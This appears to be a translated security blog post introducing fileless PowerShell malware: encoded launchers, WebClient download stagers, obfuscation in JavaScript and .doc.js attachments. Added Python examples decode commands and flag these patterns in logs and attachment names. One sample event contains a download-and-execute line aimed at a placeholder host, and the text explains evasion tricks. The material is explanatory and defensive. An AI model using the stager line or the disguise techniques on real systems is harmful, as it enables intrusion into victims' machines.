Adventures of the Elusive Malware, Part I

With this article we begin a series of publications about elusive malware. Attack programs that leave no trace on disk, known as fileless ("bodiless", invisible) malware, typically use PowerShell on Windows systems to covertly run commands that search for and extract valuable content. Detecting hacker activity when there are no malicious files is a hard task: antiviruses and many other detection systems work on the basis of signature analysis. The good news is that software capable of catching it does exist, for example UBA systems, which can detect malicious activity in file systems.

When I first started learning about clever hackers who don't use traditional methods of infection but only the tools and software already available on the victim's computer, I had no idea this would soon become a popular attack method. Security professionals say it is becoming a trend, and the scary article headlines confirm it. So I decided to make a series of publications on this topic.

The Great and Terrible PowerShell

I have written about some of these ideas before in my PowerShell obfuscation series, but more from a theoretical point of view. Later I came across the Hybrid Analysis site, where you can find samples of malware "caught" in the wild. I decided to try using this site to find fileless malware samples, and I succeeded. By the way, if you want to go on your own malware-sniffing expedition, you'll have to check in with this site to let them know you're doing white-hat work. As a blogger who writes about security, I passed without question. I'm sure you can too.

In addition to the samples themselves, the site shows what these programs do. Hybrid Analysis runs the malware in its own sandbox, monitors system calls, running processes and network activity, and extracts suspicious text strings. For binaries and other executables, where you can't even look at the actual high-level code, Hybrid Analysis decides whether the software is malicious or merely suspicious based on its runtime activity, and the sample is then rated accordingly.

In the case of PowerShell and other script samples (Visual Basic, JavaScript, etc.), I was able to see the code itself. For example, I came across this PowerShell instance:

Base64-encoded PowerShell can also be run to avoid detection. Notice the use of the NonInteractive and Hidden options.

If you've read my obfuscation posts, you know that the -e option indicates that the content is base64 encoded. By the way, Hybrid Analysis also helps here by decoding everything back. If you want to try decoding base64 PowerShell (hereinafter PS) yourself, run this command:

 [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))
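The same decoding as an added Python example (not code from the original article), the way a defender would apply it to a command line pulled from a process-creation event rather than typing it into PowerShell. The sample command line is constructed here from a harmless Write-Host, so the base64 blob is not the article's sample; the switch list and the indicator names are this example's own choices.

```python
import base64
from typing import List, Optional

# Constructed sample: a command line as it might appear in a process-creation
# event. The payload is a harmless Write-Host built here for illustration,
# not the script from the article.
SAMPLE_PAYLOAD = 'Write-Host "decoded ok"'
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -e "
    + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode("ascii")
)

# Switches worth noting in a log; matching is by prefix because PowerShell
# accepts any unambiguous abbreviation (-NonI, -w, ...).
WATCHED_SWITCHES = ("noninteractive", "windowstyle", "noprofile", "executionpolicy")


def is_encoded_flag(tok: str) -> bool:
    """True for -e, -ec, -enc, ..., -EncodedCommand (any prefix PowerShell accepts)."""
    return len(tok) >= 2 and tok[0] in "-/" and "encodedcommand".startswith(tok[1:].lower())


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 blob that follows an -EncodedCommand style switch, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            return tokens[i + 1]
    return None


def decode_powershell(encoded: str) -> str:
    """Python equivalent of the one-liner above:
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($EncodedText)).
    PowerShell's 'Unicode' means UTF-16LE, which is why a plain base64 decode
    shows the text interleaved with NUL bytes."""
    padded = encoded + "=" * (-len(encoded) % 4)  # tolerate stripped '=' padding
    return base64.b64decode(padded).decode("utf-16le")


def watched_switches(cmdline: str) -> List[str]:
    """Return full names of the watched switches present, in command-line order."""
    found = []
    for tok in cmdline.split():
        if len(tok) < 2 or tok[0] not in "-/" or is_encoded_flag(tok):
            continue
        body = tok[1:].lower()
        for name in WATCHED_SWITCHES:
            if name.startswith(body) and name not in found:
                found.append(name)
    return found


if __name__ == "__main__":
    blob = extract_encoded_command(SAMPLE_CMDLINE)
    print("switches:", watched_switches(SAMPLE_CMDLINE))
    print("decoded :", decode_powershell(blob) if blob else "<no encoded command>")
```

The padding fix matters in practice: command lines copied out of event viewers or SIEM fields often lose trailing `=` characters, and the .NET FromBase64String call would reject them outright.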

Let's dig deeper

I decoded our PS script using this method; the text of the program, slightly modified by me, is below:

Note the date set in the script, 4 September 2017, and that it was passing session cookies.

I wrote about this style of attack in my PS obfuscation series: the base64-encoded script itself downloads the remaining malware from another site, using the WebClient object from the .NET Framework library to do all the hard work.

What does it do?

For security software that scans Windows or firewall event logs, base64 encoding keeps the plain-text pattern "WebClient" from being spotted, so the web request it makes is not blocked. And since all the "evil" malware is then downloaded and handed to our PowerShell, this approach seems to evade detection completely. At least, that's what I thought at first.

It turns out that with Windows PowerShell advanced logging enabled (see my article), you can see the downloaded string in the event log. I (like others) think Microsoft should enable this level of logging by default. So with extended logging turned on, we would see in the Windows event log the completed download request from the PS script in the example we analyzed above. It makes sense to turn it on, agreed?
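To show what that logging buys a defender, here is an added Python example (not from the original article) that runs a few indicator patterns over the decoded script text that Script Block Logging records as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. The events are constructed samples with a placeholder URL, the indicator names and severity rules are this example's own, and the first event has the shape described above: WebClient fetches a second stage and it is executed in memory.

```python
import re
from typing import Dict, List

# Indicators matched against the decoded script text of a 4104 event.
# Names and patterns are this example's own choices, not a vendor rule set.
INDICATORS = {
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download_call": re.compile(r"\.Download(String|File|Data)\s*\(", re.I),
    "invoke_expression": re.compile(r"(?<![\w-])(iex|Invoke-Expression)(?![\w-])", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

# Constructed sample events (not the article's sample). Only 4104 carries the
# decoded script block; 4103 (module logging) uses a different field.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText":
        "$w = New-Object Net.WebClient; IEX $w.DownloadString('http://placeholder.invalid/stage2.ps1')"},
    {"EventID": 4104, "ScriptBlockText":
        "Get-ChildItem C:\\Logs -Filter *.log | Measure-Object"},
    {"EventID": 4103, "Payload": "CommandInvocation(Get-Date)"},
]


def scan_script_block(text: str) -> List[str]:
    """Names of the indicators present in one decoded script block, in table order."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def severity(found: List[str]) -> str:
    """A download call paired with in-memory execution (or the WebClient object
    itself) is the fileless stager shape; anything else on the list is worth a look."""
    if "download_call" in found and ("invoke_expression" in found or "webclient" in found):
        return "high"
    return "medium" if found else "none"


def triage(events: List[Dict]) -> List[Dict]:
    """Filter to script block events, scan them and return the ones that matched."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue  # only script block events carry the decoded text
        text = ev.get("ScriptBlockText", "")
        found = scan_script_block(text)
        sev = severity(found)
        if sev != "none":
            hits.append({"severity": sev, "indicators": found, "snippet": text[:80]})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["severity"], hit["indicators"], hit["snippet"])
```

The point of the 4104 event is that these patterns hit regardless of how the launcher was encoded: the base64 wrapper hides "WebClient" from a command-line scanner, but the engine logs the script block after it has been decoded.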

Adding more scripts

Hackers cleverly hide a PowerShell attack in Microsoft Office macros written in Visual Basic and other scripting languages. The idea is that the victim receives a message, say from a delivery service, with an attached report in .doc format. You open this document, which contains the macro, and it ends up running the malicious PowerShell.

Often the Visual Basic script itself is obfuscated so that it easily evades antiviruses and other malware scanners. In that spirit, I decided as an exercise to wrap the above PowerShell in JavaScript. Below are the results of my work:

Obfuscated JavaScript hiding our PowerShell. Real hackers do this as well.

This is another technique I've come across on the web: using Wscript.Shell to run encoded PowerShell. Incidentally, JavaScript is itself a means of malware delivery. Many versions of Windows have a built-in Windows Script Host, which can run JS on its own.
In our case, the malicious JS script is attached as a .doc.js file. Windows typically shows only the first suffix, so it appears to the victim as a Word document.

The JS type is visible only in the scroll icon. Not surprisingly, many people will open this attachment thinking it is a Word document.
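The double-extension trick is easy to check for on a mail gateway or in an attachment log. The following is an added Python example (not code from the original article) that classifies an attachment name by its real, last extension and by what Explorer would display with "Hide extensions for known file types" on; the extension sets and verdict names are this example's own assumptions.

```python
from pathlib import PurePath
from typing import Dict

# Extensions Windows Script Host or the shell will execute directly.
EXECUTABLE = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1",
              ".exe", ".scr", ".com", ".bat", ".cmd", ".pif"}
# Extensions a user expects to be harmless documents or images.
DOCUMENT_LIKE = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf",
                 ".txt", ".rtf", ".jpg", ".jpeg", ".png"}


def classify_attachment(name: str) -> Dict[str, str]:
    """Report the real file type and how Explorer shows the name when it hides
    the final registered extension, then give a verdict:
      deceptive - executable hiding behind a document-looking inner extension
      script    - executable, but not disguised
      ok        - anything else
    """
    # .strip() tolerates spaces around extensions, e.g. "report.doc .js"
    suffixes = [s.strip().lower() for s in PurePath(name).suffixes]
    real = suffixes[-1] if suffixes else ""
    inner = suffixes[-2] if len(suffixes) >= 2 else ""
    # Explorer hides only the last extension, so "report.doc.js" shows as "report.doc"
    displayed = name[: -len(real)] if real and name.lower().endswith(real) else name
    if real in EXECUTABLE and inner in DOCUMENT_LIKE:
        verdict = "deceptive"
    elif real in EXECUTABLE:
        verdict = "script"
    else:
        verdict = "ok"
    return {"name": name, "real_type": real, "displayed_as": displayed, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample names, not real attachments
    for n in ("Delivery_Report.doc.js", "invoice.pdf", "setup.js", "README"):
        print(classify_attachment(n))
```

On a gateway, "deceptive" and "script" are the two verdicts to quarantine or at least rewrite; "ok" still deserves the usual macro and content inspection, since the .doc-with-macro case above passes this name check untouched.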

In my example, I modified the PowerShell above to download the script from my website. The downloaded PS script just prints "Evil Malware". As you can see, it's not evil at all. Of course, real hackers are interested in gaining access to a laptop or server, say through a command shell. In the next article, I'll show how that is done using PowerShell Empire.

I hope this first introductory article did not dive too deep into the topic. Now I'll let you take a breath, and next time we'll start analyzing real examples of attacks using fileless malware without unnecessary introductions and preparation.

Source: habr.com